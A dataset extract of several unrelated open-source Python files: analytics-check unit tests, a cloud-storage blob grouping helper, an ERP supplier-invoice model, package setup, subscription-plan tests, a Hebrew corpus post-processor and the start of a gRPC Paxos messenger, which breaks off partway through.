max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M |
|---|---|---|---|---|
google_analytics/test_google_analytics.py | StackVista/sts-agent-integrations-core | 3 | 6616751 | # stdlib
import os
# 3p
import json
from mock import Mock
# datadog
from tests.checks.common import AgentCheckTest, Fixtures
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'ci')
class GoogleAnalytics(AgentCheckTest):
CHECK_NAME = "google_analytics"
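# Shared helpers for the test cases below: _config() injects a fixed GA
# profile into every instance, and _get_json() loads a named JSON fixture
# from FIXTURE_DIR.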
@staticmethod
def _config(instances):
def include_profile(instance):
instance['profile'] = 'ga:12345678'
return instance
return {
'init_config': {
'key_file_location': '/dev/null'
},
'instances': [include_profile(instance) for instance in instances]
}
@staticmethod
def _get_json(file_name):
return json.loads(Fixtures.read_file("%s.json" % file_name, sdk_dir=FIXTURE_DIR))
class TestRealtimeGoogleAnalytics(GoogleAnalytics):
"""
Unit tests for the real-time Google Analytics AgentCheck.
"""
def test_detect_real_time_required(self):
process_realtime_mock = Mock()
process_ga_mock = Mock()
self.run_check(self._config([{
'metrics': ['rt:pageviews']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'process_realtime': process_realtime_mock,
'process_ga': process_ga_mock
})
self.assertTrue(process_realtime_mock.called, msg='Method process_realtime should have been called.')
self.assertFalse(process_ga_mock.called, msg='Method process_ga should not have been called.')
def test_detect_non_real_time_required(self):
process_realtime_mock = Mock()
process_ga_mock = Mock()
self.run_check(self._config([{
'metrics': ['ga:pageviews']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'process_realtime': process_realtime_mock,
'process_ga': process_ga_mock
})
self.assertFalse(process_realtime_mock.called, msg='Method process_realtime should not have been called.')
self.assertTrue(process_ga_mock.called, msg='Method process_ga should have been called.')
def test_metric(self):
self.run_check(self._config([{
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=40, tags=['profile:ga:12345678', 'rt.minutesAgo:01'], count=1)
def test_one_metric_one_dimension_minutesAgo_no_filter_no_minute(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter_no_minute_value"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertEqual(len(self.metrics), 0, "No metrics should have been collected.")
def test_one_metric_empty_results(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter_no_result"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertEqual(len(self.metrics), 0, "No metrics should have been collected.")
def test_one_metric_no_dimension_no_filter(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:activeUsers'],
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_no_dimensions_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.activeUsers", value=2, tags=['profile:ga:12345678'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_two_dimensions_one_filter(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo', 'rt:pagePath'],
'filters': 'rt:pagePath=~^/booker/selection.outbound'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_two_dimensions_one_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=1, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=2, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.connections'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=2, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.connections/bookingSummaryModal'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=1, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.detail'], count=1)
self.assertEqual(len(self.metrics), 4, msg='Four metrics should have been collected.')
def test_metric_instance_tags(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo'],
'tags': ['env:test', 'key:value']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=40, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'env:test', 'key:value'], count=1)
class TestGoogleAnalytics(GoogleAnalytics):
"""
Unit tests for the non-real-time Google Analytics AgentCheck.
"""
def test_empty_metrics(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath', 'ga:browser'],
'filters': ['ga:pagePath==/booker_v3/confirmation', 'ga:browser==Chrome2'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_two_dimensions_two_filters_no_results")
})
self.assertEqual(len(self.metrics), 0, msg='No metrics should have been collected.')
def test_empty_dimensions(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_no_dimensions_no_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=8119, tags=['profile:ga:12345678'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_one_dimension_one_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'dimensions': ['ga:pagePath'],
'filters': 'ga:pagePath==/booker_v3/confirmation',
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_one_dimension_one_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678','ga.pagePath:/booker/confirmation'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_one_dimension_no_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'dimensions': ['ga:pagePath'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_one_dimension_no_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=29, tags=['profile:ga:12345678', 'ga.pagePath:/'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=39, tags=['profile:ga:12345678', 'ga.pagePath:/aftersales/cancel-step-1'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=15, tags=['profile:ga:12345678', 'ga.pagePath:/aftersales/cancel-step-2'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=0, tags=['profile:ga:12345678', 'ga.pagePath:/nl/tickets'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=0, tags=['profile:ga:12345678', 'ga.pagePath:/nl/tickets-v3/'], count=1)
self.assertEqual(len(self.metrics), 5, msg='Five metrics should have been collected.')
def test_two_metrics_one_dimension_one_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath'],
'filters': ['ga:pagePath==/booker_v3/confirmation'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_one_dimension_one_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.users", value=6, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation'], count=1)
self.assertEqual(len(self.metrics), 2, msg='Two metrics should have been collected.')
def test_two_metrics_two_dimensions_two_filters(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath', 'ga:browser'],
'filters': ['ga:pagePath==/booker_v3/confirmation', 'ga:browser==Chrome'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_two_dimensions_two_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation', 'ga.browser:Chrome'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.users", value=6, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation', 'ga.browser:Chrome'], count=1)
self.assertEqual(len(self.metrics), 2, msg='Two metrics should have been collected.')
def test_instance_tags(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'start_time': '2daysAgo',
'end_time': '1daysAgo',
'tags': ['tag:tag1', 'key:value']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_no_dimensions_no_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=8119, tags=['profile:ga:12345678','tag:tag1', 'key:value'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
blobs/blob_group.py | firepol/migrate-wordpress-to-google-cloud-python-datastore-blog | 1 | 6616752 | from dataclasses import dataclass
from typing import Dict, List
from google.cloud.storage import Blob
from blobs.blob_file import BlobFile
from blobs.file_type import FileType, get_fallback
@dataclass
class BlobGroup:
name: str
files: Dict[FileType, BlobFile] = None
thumbnail_url: str = None
def __init__(self, name: str):
self.name = name
self.files = dict()
def get_thumbnail(self):
return get_blob_version(300, self.files)
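# Map a requested pixel size onto the smallest rendition that still covers it;
# get_fallback() degrades to an available FileType when the wished one is missing.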
def get_blob_version(max_size: int, blob_files: Dict[FileType, BlobFile]):
"""
Return the largest blob rendition that fits within max_size, falling back to the original (or the closest available version) when that size was not generated
"""
wished_file_type = FileType.Original
if max_size <= 150:
wished_file_type = FileType.LittleSquare
elif max_size <= 300:
wished_file_type = FileType.Thumbnail
elif max_size <= 624:
wished_file_type = FileType.Medium
elif max_size <= 1024:
wished_file_type = FileType.Large
available_file_types = [b.file_type for b in blob_files.values()]
file_type = get_fallback(wished_file_type, available_file_types)
return blob_files[file_type]
def get_dict_blob_group(blobs: List[Blob]):
"""
From a given list of blobs, get a dictionary with keys = group names, values = BlobGroups
"""
result = dict()
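# Group blobs by their base name: each BlobGroup collects every rendition
# (original, thumbnail, ...) of the same underlying file.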
for b in blobs:
blob_file = BlobFile(b)
group_name = blob_file.group_name
if group_name not in result:
result[group_name] = BlobGroup(group_name)
group = result[group_name]
group.files[blob_file.file_type] = blob_file
group.thumbnail_url = group.get_thumbnail().public_url
return result
core/objs/factura_forn.py | aanacleto/erp- | 0 | 6616753 | # !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = '<NAME>'
__credits__ = []
__version__ = "1.0"
__maintainer__ = "<NAME>"
__status__ = "Development"
__model_name__='factura_forn.FacturaFornecedor'
import auth, base_models
from orm import *
from form import *
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
class FacturaFornecedor(Model, View):
def __init__(self, **kargs):
Model.__init__(self, **kargs)
self.__name__ = 'factura_forn'
self.__title__= 'Facturas de Fornecedor'
self.__model_name__ = __model_name__
self.__list_edit_mode__ = 'edit'
self.__order_by__ = 'int8(factura_forn.numero) DESC'
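# Workflow: the state field plus the transitions allowed from each state;
# __workflow_auth__ below restricts which groups may trigger each transition.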
self.__workflow__ = (
'estado', {'Rascunho':['Confirmar'], 'Confirmado':['Imprimir', 'Pagar', 'Cancelar'], 'impresso':['Cancelar'], 'cancelado':[]}
)
self.__workflow_auth__ = {
'Confirmar':['All'],
'Imprimir':['All'],
'Pagar':['Caixa'],
'Cancelar':['Gestor'],
'full_access':['Gestor']
}
self.__tabs__ = [
('Faturação', ['data','numero','serie','fornecedor','retencao','taxa_retencao','estado','residual','notas','vendedor','linha_factura_forn','total','total_desconto', 'total_iva','total_dedutivel','valor_retido']),
('Movimentos', ['movs_contab', 'movs_stock']),
('Pagamentos',['pagamentos']),
]
self.__no_edit__ = [
('estado', ['Confirmado','Pago','Impresso','Cancelado'])
]
self.__auth__ = {
'read':['All'],
'write':['All'],
'create':['All'],
'delete':['Gestor'],
'full_access':['Gestor']
}
self.__get_options__ = ['numero']
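# Field declarations; view_order fixes each field's position in the form layout.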
self.data = date_field(view_order=1, name ='Data', args='required ', default=datetime.date.today())
self.numero = info_field(view_order=2, name ='Número',size=30)
self.serie = string_field(view_order=3, name='Serie', size=30, args='required')
self.notas = string_field(view_order=4, name ='Notas', args='autocomplete="on"', size=200, onlist=False)
self.fornecedor = choice_field(view_order=5, name ='Fornecedor', args='required', size=100, model='terceiro', column='nome', options='model.get_fornecedores()')
self.residual = currency_field(view_order=6, name ='Valor Residual', args='readonly', size=45, sum=True)
self.estado = info_field(view_order=7, name ='Estado', size=45, default='Rascunho', options=[('rascunho','Rascunho'), ('confirmado','Confirmado'), ('cancelado','Cancelado')])
self.pagamentos = list_field(view_order=8, name ='Pagamentos', condition="documento='factura_forn' and num_doc={numero}", model_name='linha_caixa.LinhaCaixa', list_edit_mode='edit', onlist = False)
self.movs_contab = list_field(view_order=9, name ='Movimentos Contab.', condition="documento='factura_forn' and num_doc={numero}", model_name='movimento.Movimento', list_edit_mode='edit', onlist = False)
self.movs_stock = list_field(view_order=10, name ='Movimentos Stock', condition="documento='factura_forn' and num_doc={numero}", model_name='stock.Stock', list_edit_mode='edit', onlist = False)
self.linha_factura_forn = list_field(view_order=11, name ='Linhas de Factura do Fornecedor', condition="factura_forn='{id}'", model_name='linha_factura_forn.LinhaFacturaFornecedor', list_edit_mode='inline', onlist= False, search= True)
self.total = function_field(view_order=12, name ='Total', size=70, sum=True)
self.total_iva = function_field(view_order=13, name ='Total IVA', size=70)
self.total_dedutivel = function_field(view_order=14, name ='Total IVA Dedutivel', size=70)
#self.retencao=boolean_field(view_order=15,name='Efectuar Retenção?', default=False,size=90)
self.retencao = combo_field(view_order=15,name='Retenção?', default="NAO", options=[('NAO','NAO'),('SIM','SIM')], size=50)
self.taxa_retencao = percent_field(view_order=16, name ='Taxa Retenção', size=45, onlist=False)
self.valor_retido=function_field(view_order=17, name='Total Retenção', onlist=False, args='readonly',size=70)
def get_fornecedores(self):
# print('in get_fornecedores of FacturaFornecedor')  # leftover debug trace
return Terceiro().get_fornecedores()
def record_lines(self, key):
# Intermediate helper that avoids multiple database hits: the query runs only once and its result is shared by all the function fields below.
def get_results():
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=key)).get()
return record_lines
# Namespace the cache key so the cached lines cannot collide with the full record cached by getRecord() below.
return erp_cache.get(key=self.__model_name__ + ':lines:' + str(key), createfunc=get_results)
def getRecord(self, key):
def get_record():
record = FacturaFornecedor(where="id = '{id}'".format(id=key)).get()
return record
return erp_cache.get(key=self.__model_name__ + ':record:' + str(key), createfunc=get_record)
def get_valor_retido(self, key):
try:
from my_rh_retencao import RHRetencao
except:
from rh_retencao import RHRetencao
value = to_decimal(0)
if self.kargs['retencao']:
taxa = self.kargs['taxa_retencao']
if to_decimal(taxa) == to_decimal(0):
ret = RHRetencao().get()
if ret:
taxa = ret[0]['taxa_prestacao_servico']
total = self.get_total(key=key)
value = to_decimal(total*taxa/100)
self.kargs['taxa_retencao']=taxa
self.put()
else:
self.kargs['taxa_retencao']=to_decimal(0)
self.put()
return round(value,0)
def get_total(self, key):
value = to_decimal(0)
record_lines = self.record_lines(key)
if record_lines:
for line in record_lines:
value += to_decimal(line['valor_total'])
return round(value,0)
def get_total_desconto(self, key):
value = to_decimal(0)
record_lines = self.record_lines(key)
if record_lines:
for line in record_lines:
value += float(line['valor_total']) * float(line['desconto']) / 100
return round(value,0)
def get_total_iva(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
value += to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100)))
return round(value,0)
def get_total_incidencia(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))
return round(value,0)
def get_total_incidencia_por_taxa(self, record_lines):
value = to_decimal(0)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))
return round(value,0)
def get_total_dedutivel(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += (to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))))*(line['direito_deducao']/100)
return round(value,0)
def get_total_dedutivel_por_taxa(self, record_lines):
value = to_decimal(0)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += (to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))))*(line['direito_deducao']/100)
return round(value,0)
def Imprimir(self, key, window_id):
template = 'factura_forn'
record = get_records_to_print(records=[self.kargs], model=self, child='linha_factura_forn')
return Report(record=record, report_template=template).show()
# TODO: wording still needs converting from customer to supplier
def Confirmar(self, key, window_id):
"""Gera movimento contabilistico (conta de receitas contra conta de terceiros)"""
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Confirmado'
if not self.kargs['numero']:
self.kargs['numero'] = base_models.Sequence().get_sequence('factura_forn')
try:
from my_diario import Diario
except:
from diario import Diario
diario = Diario().get_diario(diario='compras')
try:
from my_periodo import Periodo
except:
from periodo import Periodo
periodo = Periodo().get_periodo(data=self.kargs['data'])
# Check whether the supplier is subject to VAT
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
terceiro = Terceiro().get(key=self.kargs['fornecedor'])[0]
sujeito_iva = terceiro['sujeito_iva']
conta_terceiro = terceiro['a_receber']
try:
from my_movimento import Movimento
except:
from movimento import Movimento
movimento = Movimento(data=self.kargs['data'], numero=base_models.Sequence().get_sequence('movimento'), num_doc=self.kargs['numero'], descricao='Vossa Factura', diario=diario, documento='factura_forn', periodo=periodo, estado='Confirmado', user=self.kargs['user']).put()
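# Header entry created; one debit/credit line pair per invoice line is posted below.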
#self.kargs['movimento'] = movimento
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=self.kargs['id'])).get()
if record_lines:
try:
from my_linha_movimento import LinhaMovimento
except:
from linha_movimento import LinhaMovimento
try:
from my_produto import Produto
except:
from produto import Produto
try:
from my_familia_produto import FamiliaProduto
except:
from familia_produto import FamiliaProduto
for line in record_lines:
# TODO: also account for the discount posting here later
quantidade = to_decimal(line['quantidade'])
product = Produto().get(key=line['produto'])[0]
contas = Produto().get_accounts(line['produto'])
#print (contas)
conta_gastos = contas['conta_gastos']
if sujeito_iva:
taxa_iva = product['iva']
else:
taxa_iva = to_decimal(0)
descricao = product['nome']
total_sem_iva = line['valor_total']/(1+taxa_iva)
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_terceiro, quant_debito=quantidade, debito=total_sem_iva, quant_credito=to_decimal(0), credito=to_decimal(0), user=self.kargs['user']).put()
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_gastos, quant_debito=to_decimal(0), debito=to_decimal(0), quant_credito=quantidade, credito=total_sem_iva, user=self.kargs['user']).put()
self.put()
ctx_dict = get_context(window_id)
ctx_dict['main_key'] = self.kargs['id']
set_context(window_id, ctx_dict)
return form_edit(window_id = window_id).show()
else:
return error_message('Não pode confirmar facturas sem linhas de factura! \n')
def Cancelar(self, key, window_id):
"""
Reverses the accounting entry:
reverses it when the invoice was confirmed, or simply cancels it while still in draft
"""
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Cancelado'
#print (self.kargs)
try:
from my_diario import Diario
except:
from diario import Diario
diario = Diario().get_diario(diario='compras')
try:
from my_periodo import Periodo
except:
from periodo import Periodo
periodo = Periodo().get_periodo(data=str(datetime.date.today()))
# Check whether the supplier is subject to VAT
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
terceiro = Terceiro().get(key=self.kargs['fornecedor'])[0]
sujeito_iva = terceiro['sujeito_iva']
conta_terceiro = terceiro['a_receber']
# Both in accounting and in stock a document may have several movements (e.g. the movement itself and its reversal); movement reconciliation will also be needed.
try:
from my_movimento import Movimento
except:
from movimento import Movimento
movimento = Movimento(data=datetime.date.today(), numero=base_models.Sequence().get_sequence('movimento'), num_doc=self.kargs['numero'], descricao='Anulação de Vossa Factura', documento='factura_forn', diario=diario, periodo=periodo, estado='Confirmado', user=self.kargs['user']).put()
#record['movimento'] = movimento
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=self.kargs['id'])).get()
if record_lines:
try:
from my_linha_movimento import LinhaMovimento
except:
from linha_movimento import LinhaMovimento
try:
from my_produto import Produto
except:
from produto import Produto
try:
from my_familia_produto import FamiliaProduto
except:
from familia_produto import FamiliaProduto
for line in record_lines:
# TODO: also account for the discount posting here later
quantidade = to_decimal(line['quantidade'])
product = Produto().get(key=line['produto'])[0]
contas = Produto().get_accounts(line['produto'])
conta_gastos = contas['conta_gastos']
if sujeito_iva:
taxa_iva = product['iva']
else:
taxa_iva = to_decimal(0)
descricao = product['nome']
total_sem_iva = line['valor_total']/(1+taxa_iva)
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_gastos, quant_debito=quantidade, debito=total_sem_iva, quant_credito=to_decimal(0), credito=to_decimal(0), user=self.kargs['user']).put()
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_terceiro, quant_debito=to_decimal(0), debito=to_decimal(0), quant_credito=quantidade, credito=total_sem_iva, user=self.kargs['user']).put()
self.put()
ctx_dict = get_context(window_id)
ctx_dict['main_key'] = self.kargs['id']
set_context(window_id, ctx_dict)
return form_edit(window_id = window_id).show()
def Rascunho(self, key, window_id):
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Rascunho'
self.put()
return form_edit(window_id = window_id).show()
setup.py | Caojunkai/douyu | 0 | 6616754 | from setuptools import setup
from douyu import __VERSION__
version = __VERSION__
setup(
name='fitz-douyu',
packages=['douyu', 'douyu.chat', 'douyu.chat.network'],
version=version,
description='Python Wrapper for DouyuTV APIs, including support for accessing ChatRoom, e.g. DanMu',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/caojunkai/douyu',
download_url='https://github.com/douyu',
keywords=['douyu', 'douyutv', 'danmu', 'chat'],
classifiers=[],
) | none | 1 | 1.444101 | 1 |
proso_subscription/commands_test.py | adaptive-learning/proso-apps | 2 | 6616755 | from django.core.management import call_command
from proso.django.test import TestCase
from .models import SubscriptionPlan, DiscountCode
class TestPlansLoading(TestCase):
def test_loading(self):
call_command('load_subscription_plans', 'testproject/test_data/subscription/plans.json')
first = SubscriptionPlan.objects.get(identifier='first')
second = SubscriptionPlan.objects.get(identifier='second')
self.assertTrue(first.active)
self.assertFalse(second.active)
self.assertEqual(first.descriptions.all().count(), 2)
self.assertEqual(second.descriptions.all().count(), 2)
self.assertTrue(first.featured)
code_global = DiscountCode.objects.get(identifier="global")
code_local = DiscountCode.objects.get(identifier="local-first")
self.assertIsNotNone(code_global.code)
self.assertEqual(code_global.discount_percentage, 100)
self.assertIsNone(code_global.plan)
self.assertIsNone(code_global.usage_limit)
self.assertEqual(code_local.code, DiscountCode.objects.prepare_code("slunicko"))
self.assertIsNotNone(code_local.plan)
self.assertEqual(code_local.usage_limit, 100)
        self.assertEqual(code_local.discount_percentage, 30)
| none | 1 | 2.23982 | 2 | |
data_preparation/postprocess_hebpipe.py | Iddoyadlin/hebrew-w2v | 7 | 6616756 | <reponame>Iddoyadlin/hebrew-w2v
#!/usr/bin/env python
from argparse import ArgumentError
from argparse import ArgumentParser
from pathlib import Path
from tqdm import tqdm
from base import get_absolute_path
def parse_args():
parser = ArgumentParser("Post process HebPipe output to a single file")
parser.add_argument("-f", "--folder", metavar="FOLDER", help="Input folder", required=True)
parser.add_argument("-o", "--output", help='Output file', required=True)
args = parser.parse_args()
return args
def get_paths(input_folder: str, output: str):
folder = get_absolute_path(input_folder)
assert folder.is_dir(), "folder must be a valid folder"
output = get_absolute_path(output)
assert not output.exists(), "output must not be an existing file"
return folder, output
def process_files(input_folder: Path, output: Path):
    # nothing to do if the tokenized input folder is missing
    if not input_folder.exists():
        print(f'tokenized output folder {input_folder} does not exist, nothing to postprocess')
        return
files = list(input_folder.glob('**/*'))
if not files:
print(f'no files were found in tokenized output folder {input_folder}.')
return
with output.open('wb+') as f2:
for fname in tqdm(files, desc='processing files', total=len(files), unit='file'):
with fname.open('rb') as f:
lines = [clean_line(line.decode()) for line in f.readlines()]
f2.write(' '.join(lines).strip().encode('utf-8'))
print(f"saved final corpus to {output}")
def main():
args = parse_args()
folder, output = get_paths(args.folder, args.output)
process_files(folder, output)
def clean_line(line):
line = line.strip().replace("|", " ")
if line in ("<s>", "</s>"):
return '\n'
else:
return line
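# Hypothetical invocation (file names are placeholders, not from the repo):
#   python postprocess_hebpipe.py -f hebpipe_output/ -o corpus.txt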
if __name__ == '__main__':
try:
main()
except ArgumentError as e:
print(e)
        exit(1) | en | 0.26433 | #!/usr/bin/env python | 3.11294 | 3
paxos/messengers/rpcMessenger.py | victordomene/ram-paxos | 0 | 6616757 | """
This module provides an implementation of the Messenger class using Google's
RPC Protocol (gRPC).
For the specific documentation of the arguments these methods take and
what they do at a high level, refer to messenger.py.
"""
from grpc.beta import implementations
from messenger import Messenger
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from protobufs import paxos_pb2
TIMEOUT_SECONDS = 10
def ignore(future):
result = future.result()
return
def ignore_accept(future):
result = future.result()
return
def ignore_promise(future):
result = future.result()
return
def ignore_learn(future):
result = future.result()
return
def ignore_refuse(future):
result = future.result()
return
class grpcMessenger(Messenger):
def __init__(self, name):
Messenger.__init__(self)
self.name = name
self.destinations = {}
return
def _fetch_stub(self, name):
# fetch the stub for the proposer
try:
stub = self.destinations[name]
        except KeyError:
            print("_fetch_stub: could not find stub for {}".format(name))
            return None
        except Exception:
            print("_fetch_stub: unknown error")
            return None
return stub
def get_quorum(self):
return self.destinations.keys()
def add_destination(self, name, host, port):
# uses gRPC to create a channel and a stub
channel = implementations.insecure_channel(host, port)
stub = paxos_pb2.beta_create_VM_stub(channel)
# simply change the entry; do not check if it already exists
self.destinations[name] = stub
# function always succeeds
return True
def send_prepare(self, p, n, quorum):
for acceptor in quorum:
